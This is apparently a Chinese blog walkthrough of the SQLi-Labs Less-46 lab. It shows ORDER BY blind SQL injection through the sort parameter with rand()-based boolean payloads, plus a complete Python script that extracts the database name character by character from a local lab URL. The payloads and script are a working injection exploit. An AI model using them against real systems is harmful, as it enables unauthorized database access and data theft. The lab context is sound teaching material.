本文介绍了在SQLLabs靶场中通过实战操作,利用sort参数进行排序实验,发现可用于SQL盲注,进而实现数据库名的爆破,展示了使用Python脚本进行ASCII字符级盲注的过程。
一,搭建sqllabs靶场
https://blog.youkuaiyun.com/Joker_Dgh/article/details/123913722
二,实战
可以看到传参参数为sort
先尝试令sort=1
可以看到是一个排序表格
再尝试令sort=2
表格按照字母顺序进行了排序,所以可知使用了order by语句
尝试使用rand()盲注,设定true和false两个参数观察回显
?sort=rand(true)
?sort=rand(false)
可以看到当给的值为真或假时是不一样的,那我们可以尝试构建一个布尔盲注或者延时盲注
?sort=rand(ascii(mid((select database()),1,1))>114)
用py脚本进行盲注
代码如下
# -*- coding:utf-8 -*-
import requests
import time
from bs4 import BeautifulSoup
def inject_database(url):
name = ''
for i in range(1, 100):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (i, mid)
res = {"sort": payload}
r = requests.post(url, params=res)
html = r.text
soup = BeautifulSoup(html,'html.parser')
getUsername = soup.find_all('td')[1].text
if getUsername == 'admin3':
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name += chr(mid)
print(name)
if __name__ == "__main__":
url = 'http://127.0.0.1/sqli-labs-master/Less-46/index.php'
inject_database(url)
可以看到脚本代码爆出了数据库名
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
